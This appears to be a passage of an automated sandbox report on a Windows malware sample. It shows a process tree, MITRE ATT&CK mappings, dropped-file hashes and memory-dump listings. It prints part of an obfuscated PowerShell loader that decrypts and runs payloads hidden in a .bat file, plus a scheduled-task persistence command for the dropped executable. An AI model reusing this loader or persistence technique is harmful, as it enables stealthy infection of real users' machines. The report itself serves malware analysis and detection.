'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_300.bat';$host.UI.RawUI.WindowTitle = $iDcUp;$WZHtU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iDcUp).Split([Environment]::NewLine);foreach ($wZzpc in $WZHtU) { if ($wZzpc.StartsWith('NYmtFIDAzglHySitKOHK')) { $YPjeF=$wZzpc.Substring(20); break; }}$payloads_var=[string[]]$YPjeF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:3192
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "syskprvalr" /tr '"C:\Users\Admin\AppData\Roaming\syskprvalr.exe"' & exit
        7⤵
        
        PID:1980
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "syskprvalr" /tr '"C:\Users\Admin\AppData\Roaming\syskprvalr.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC0F.tmp.bat""
        7⤵
        
        PID:4104
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:844
        
        C:\Users\Admin\AppData\Roaming\syskprvalr.exe
        
        "C:\Users\Admin\AppData\Roaming\syskprvalr.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:3540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
debee9a5d8ae06b9bd47231e63435704

SHA1
ddec3b3bc7fff4df48ac910ce4bef1a6021a57a4

SHA256
c24e1d10ed1c4b1d8380c2a20bb8fccf356d5ac98d17617c0cfa8851228cdbaf

SHA512
d95148112c01f060e3d44f87e6c0c52d01d3389bfd0a66c3d6a7f658cae56c7b021d0dcfbdb6f91fbb8158acd1c4bf6da96e0a55bd129ec42ade320a338ee0e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
3ccf13786554a09feada0ddedbc8a646

SHA1
54d359350816173172d9a351b465207e4be88a8f

SHA256
f436e158dc2fc703547bec5d5111f4a7d43b2b7bb02a16dbab812e48ce8e5ca9

SHA512
6fb3d66ccc739b2a6d93b19af338b3b8cda9c3d431dc9343ccfb7c121fc7f4383aad7581e6e27f9bd482d40b970ab6a61a4365a8003a96b190a9e781b2ae91b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m1gohbnn.nwt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAC0F.tmp.bat

Filesize
154B

MD5
0fe5dce70ffd2021fd6328b1f890a919

SHA1
2fefca5025bed60deac982aa3bf58dd27240ca43

SHA256
5fb5113b19345bdf410515e9985c8de25b0b6f297938311975e51797797d979e

SHA512
3333c81cc4a0722708ced2c70163b0f4516501c2ed97ee61997648bea1e09c5519207ca46828aa8d678d5341669adf86335a61d4299da2a1f660545d77ee0399

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_300.vbs

Filesize
124B

MD5
c72f07fe8f8240efa8dc995c0b74031c

SHA1
4652239958486b344430744fc7a1470c1c156b0b

SHA256
8de1b345a3d299e8c811b519e13e57e2384810113cd360dbbca9c96d5c493086

SHA512
3687de44529d1e6439e80f800205deba4e89452e04657b0b320ec5bb208f26af5799fc2fe83231ee9021452f24004b543e43ddf31e0aca823180cfabbd605e16

Download Submit
C:\Users\Admin\AppData\Roaming\syskprvalr.exe

Filesize
445KB

MD5
2e5a8590cf6848968fc23de3fa1e25f1

SHA1
801262e122db6a2e758962896f260b55bbd0136a

SHA256
9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

SHA512
5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
c6086d02f8ce044f5fa07a98303dc7eb

SHA1
6116247e9d098b276b476c9f4c434f55d469129c

SHA256
8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0

SHA512
1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
39b9eb9d1a56bc1792c844c425bd1dec

SHA1
db5a91082fa14eeb6550cbc994d34ebd95341df9

SHA256
acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

SHA512
255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
4ac1741ceb19f5a983079b2c5f344f5d

SHA1
f1ebd93fbade2e035cd59e970787b8042cdd0f3b

SHA256
7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

SHA512
583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
a9124c4c97cba8a07a8204fac1696c8e

SHA1
1f27d80280e03762c7b16781608786f5a98ff434

SHA256
8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

SHA512
537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

Download Submit
memory/736-58-0x0000027C714F0000-0x0000027C71506000-memory.dmp

Filesize
88KB

Download
memory/744-119-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/796-114-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1320-110-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1336-118-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1348-117-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1392-115-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1540-113-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1564-112-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1920-121-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/1932-116-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/2268-20-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2268-34-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2268-30-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2268-31-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2408-108-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/2680-17-0x000001EDF83E0000-0x000001EDF842A000-memory.dmp

Filesize
296KB

Download
memory/2680-11-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2680-43-0x00007FFC6B823000-0x00007FFC6B825000-memory.dmp

Filesize
8KB

Download
memory/2680-55-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2680-56-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2680-10-0x000001EDF7F40000-0x000001EDF7F62000-memory.dmp

Filesize
136KB

Download
memory/2680-13-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2680-14-0x000001EDF8000000-0x000001EDF8044000-memory.dmp

Filesize
272KB

Download
memory/2680-0-0x00007FFC6B823000-0x00007FFC6B825000-memory.dmp

Filesize
8KB

Download
memory/2680-44-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2680-19-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2680-12-0x00007FFC6B820000-0x00007FFC6C2E2000-memory.dmp

Filesize
10.8MB

Download
memory/2680-16-0x000001EDF7FB0000-0x000001EDF7FB8000-memory.dmp

Filesize
32KB

Download
memory/2680-15-0x000001EDF8460000-0x000001EDF84D6000-memory.dmp

Filesize
472KB

Download
memory/2808-111-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/3296-120-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/3540-109-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download
memory/3652-57-0x0000000002D40000-0x0000000002D6A000-memory.dmp

Filesize
168KB

Download
memory/3652-107-0x00007FFC4A670000-0x00007FFC4A680000-memory.dmp

Filesize
64KB

Download